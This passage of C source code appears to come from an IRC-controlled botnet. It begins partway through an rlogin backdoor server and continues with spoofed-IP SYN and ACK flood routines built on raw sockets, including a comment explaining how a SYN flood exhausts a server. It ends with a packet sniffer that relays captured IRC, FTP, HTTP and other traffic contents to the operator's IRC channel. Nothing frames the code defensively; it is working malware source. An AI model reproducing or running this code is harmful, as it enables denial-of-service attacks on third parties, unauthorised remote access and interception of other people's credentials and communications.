sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
DWORD WINAPI SnifferThread(LPVOID param) { SNIFFER sniff = *((SNIFFER *)param); SNIFFER *sniffs = (SNIFFER *)param; sniffs->gotinfo = TRUE; char sendbuf[IRCLINE]; int sock; sockaddr_in addr_in; hostent *hEnt; IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; char szName[255]={0}; unsigned long lLocalIp; addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); addr_in.sin_addr.s_addr=lLocalIp; sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); if(sock==INVALID_SOCKET) return NULL; if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } int optval=1; DWORD dwBytesRet; if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; while(1) { // Clear the buffer memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; // Read the raw packet iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); // Process if its a TCP/IP packet if(ipHeader->proto==6) { tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) { sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); for(int i=0; i<(int)strlen(szPacket); i++) { if(szPacket[i]=='\r') szPacket[i]='\x20'; if(szPacket[i]=='\n') szPacket[i]='\x20'; } if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousHTTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousVULN(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } } } } fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); return 0; }